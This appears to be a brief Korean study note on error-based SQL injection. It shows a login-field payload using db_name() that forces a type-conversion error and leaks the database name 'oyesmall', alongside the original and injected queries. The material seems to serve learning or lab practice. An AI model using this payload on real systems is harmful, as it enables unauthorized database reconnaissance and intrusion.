DB 이름 추출 : db_name() 함수 활용
⇒’ and db_name() > 1 --
예상 SQL 문
”SELECT * FROM ~~ WHERE user_id = ‘id’ and passwd = ‘pw’”
문자열과 int 형을 대소비교하여 오류메시지를 유도한다
예상 SQL 변경
”SELECT * FROM ~~ WHERE user_id = ‘’ and db_name() > 1 --’ and passwd = ‘pw’”
해당 공격 문자열 입력 (비밀번호는 중요하지않음)
오류메세지 확인 (DB 이름 확보)
해당 공격을 통해 DB 이름이 ‘oyesmall’ 이라는 정보를 알 수 있다